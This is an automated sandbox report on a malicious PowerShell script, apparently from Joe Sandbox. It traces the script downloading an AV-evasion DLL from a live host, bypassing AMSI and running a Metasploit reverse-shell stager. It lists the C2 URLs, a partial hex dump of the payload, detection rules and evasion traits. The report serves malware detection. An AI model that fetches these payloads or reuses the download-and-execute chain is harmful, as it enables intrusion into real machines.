Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Execute.ps1

Overview

General Information

Sample name:Execute.ps1
Analysis ID:1591975
MD5:4dcc2df2d674dab72c13fd4cd34097f8
SHA1:db114339bd7b17a6fc1041b565046d506b457725
SHA256:37eb80a2bc8664f6f670015add9d235ba4d6f34450c6f48475e1679424b05a78
Tags:downloadermalwareps1user-Joker
Infos:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
AI detected suspicious sample
Bypasses AMSI via dropped C# code
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Malware Callback Communication
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 348 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 3948 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup

Malware Configuration

Threatname: Metasploit

{"Type": "Metasploit Download", "URL": "http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
    • 0x10c:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
    00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
    • 0xb2:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
    Process Memory Space: powershell.exe PID: 3648INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x100035:$b2: ::FromBase64String(
    • 0x28eb5:$s1: -join
    • 0x35f8a:$s1: -join
    • 0x3935c:$s1: -join
    • 0x39a0e:$s1: -join
    • 0x3b4ff:$s1: -join
    • 0x3d705:$s1: -join
    • 0x3df2c:$s1: -join
    • 0x3e79c:$s1: -join
    • 0x3eed7:$s1: -join
    • 0x3ef09:$s1: -join
    • 0x3ef51:$s1: -join
    • 0x3ef70:$s1: -join
    • 0x3f7c0:$s1: -join
    • 0x3f93c:$s1: -join
    • 0x3f9b4:$s1: -join
    • 0x3fa47:$s1: -join
    • 0x3fcad:$s1: -join
    • 0x41e43:$s1: -join
    • 0x5088d:$s1: -join
    • 0x65fd5:$s1: -join

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Potentially Suspicious Malware Callback Communication
    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 158.101.196.44, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Initiated: true, ProcessId: 3648, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
    Sigma detected: Change PowerShell Policies to an Insecure Level
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", ProcessId: 3648, ProcessName: powershell.exe
    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", ProcessId: 348, ProcessName: csc.exe
    Sigma detected: Dynamic CSharp Compile Artefact
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3648, TargetFilename: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", ProcessId: 3648, ProcessName: powershell.exe

    Data Obfuscation

    barindex
    Sigma detected: Dot net compiler compiles file from suspicious location
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline", ProcessId: 348, ProcessName: csc.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T16:02:23.237129+010020287653Unknown Traffic192.168.2.849705158.101.196.444444TCP
    2025-01-15T16:02:31.551525+010020287653Unknown Traffic192.168.2.849708158.101.196.444444TCP
    2025-01-15T16:02:39.785833+010020287653Unknown Traffic192.168.2.849715158.101.196.444444TCP
    2025-01-15T16:02:48.103350+010020287653Unknown Traffic192.168.2.849718158.101.196.444444TCP
    2025-01-15T16:02:56.397561+010020287653Unknown Traffic192.168.2.849721158.101.196.444444TCP
    2025-01-15T16:03:04.668695+010020287653Unknown Traffic192.168.2.849724158.101.196.444444TCP
    2025-01-15T16:03:12.958618+010020287653Unknown Traffic192.168.2.849727158.101.196.444444TCP
    2025-01-15T16:03:21.394361+010020287653Unknown Traffic192.168.2.849731158.101.196.444444TCP
    2025-01-15T16:03:29.647376+010020287653Unknown Traffic192.168.2.849734158.101.196.444444TCP
    2025-01-15T16:03:37.912504+010020287653Unknown Traffic192.168.2.849773158.101.196.444444TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T16:02:20.944034+010028033053Unknown Traffic192.168.2.849704158.101.196.4480TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T16:02:20.944056+010018100032Potentially Bad Traffic158.101.196.4480192.168.2.849704TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T16:02:20.623250+010018100002Potentially Bad Traffic192.168.2.849704158.101.196.4480TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://158.101.196.44/AVEvasion.dllAvira URL Cloud: Label: malware
    Source: http://158.101.196.44/random.txtAvira URL Cloud: Label: malware
    Found malware configuration
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Type": "Metasploit Download", "URL": "http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK"}
    Multi AV Scanner detection for submitted file
    Source: Execute.ps1Virustotal: Detection: 33%Perma Link
    Source: Execute.ps1ReversingLabs: Detection: 13%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dllJoe Sandbox ML: detected
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.pdb source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.pdbhP source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\justs\source\repos\avevasion\AVEvasion\obj\Release\net48\AVEvasion.pdb source: powershell.exe, 00000000.00000002.2380893802.000001B129860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\justs\source\repos\avevasion\AVEvasion\obj\Release\net48\AVEvasion.pdbSHA256 source: powershell.exe, 00000000.00000002.2380893802.000001B129860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK
    Source: global trafficTCP traffic: 192.168.2.8:49705 -> 158.101.196.44:4444
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Jan 2025 15:02:20 GMTServer: Apache/2.4.6 ()Last-Modified: Sun, 11 Dec 2022 17:20:04 GMTETag: "1600-5ef9098fc4e22"Accept-Ranges: bytesContent-Length: 5632Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd 89 29 e2 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 0e 00 00 00 06 00 00 00 00 00 00 9a 2c 00 00 00 20 00 00 00 40 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 47 2c 00 00 4f 00 00 00 00 40 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 64 2b 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0c 00 00 00 20 00 00 00 0e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 03 00 00 00 40 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7b 2c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 80 21 00 00 e4 09 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 25 00 00 00 01 00 00 11 02 0a 16 0b 2b 17 06 07 02 07 91 20 aa 00 00 00 61 20 ff 00 00 00 5f d2 9c 07 17 58 0b 07 02 8e 69 32 e3 06 2a 00 00 00 13 30 06 00 aa 00 00 00 02 00 00 11 28 05 00 00 06 7e 0c 00 00 0a 20 00 10 00 00 7e 03 00 00 04 7e 02 00 00 04 16 28 04 00 00 06 26 02 18 8d 10 00 00 01 25 16 1f 20 9d 25 17 1f 2c 9d 17 6f 0d 00 00 0a 7e 05 00 00 04 25 2d 17 26 7e 04 00 00 04 fe 06 0d 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 28 02 00 00 2b 0a 06 28 07 00 00 06 0a 7e 0c 00 00 0a 06 8e 69 7e 01 00 00 04 7e 02 00 00 04 28 01 00 00 06 0b 06 16 07 06 8e 69 28 11 00 00 0a 7e 0c 00 00 0a 16 07 7e 0c 00 00 0a 16 7e 0c 00 00 0a 28 02 00 00 06 15 28 03 00 00 06 26 2a 1e 02 28 12 00 00 0a 2a 72 20 00 10 00 00 80 01 00 00 04 1f 40 80 02 00 00 04 20 00 30 00 00 80 03 00 00 04 2a 2e 73 0c 00 00 06 80 04 00 00 04 2a 1e 02 28 12 00 00 0a 2a 26 03 1f 10 28 13 00 00 0a 2a 00 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33
    Source: global trafficHTTP traffic detected: GET /AVEvasion.dll HTTP/1.1Host: 158.101.196.44
    Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49724 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49718 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49727 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49721 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49708 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49734 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49731 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49705 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49773 -> 158.101.196.44:4444
    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49704 -> 158.101.196.44:80
    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49704 -> 158.101.196.44:80
    Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 158.101.196.44:80 -> 192.168.2.8:49704
    Source: global trafficHTTP traffic detected: GET /random.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 158.101.196.44Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: unknownTCP traffic detected without corresponding DNS query: 158.101.196.44
    Source: global trafficHTTP traffic detected: GET /random.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 158.101.196.44Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /AVEvasion.dll HTTP/1.1Host: 158.101.196.44
    Source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.196.44
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp, Execute.ps1String found in binary or memory: http://158.101.196.44/AVEvasion.dll
    Source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp, Execute.ps1String found in binary or memory: http://158.101.196.44/random.txt
    Source: powershell.exe, 00000000.00000002.2374757249.000001B1211D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B112A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000000.00000002.2379335925.000001B129484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://158.101.196.44/
    Source: powershell.exe, 00000000.00000002.2379335925.000001B129484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://158.101.196.44/)
    Source: powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://158.101.196.44:4444/
    Source: powershell.exe, 00000000.00000002.2379335925.000001B129451000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2379335925.000001B129497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://158.101.196.44:4444/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUv
    Source: powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://158.101.196.44:4444/g
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000000.00000002.2374757249.000001B1211D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B112A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
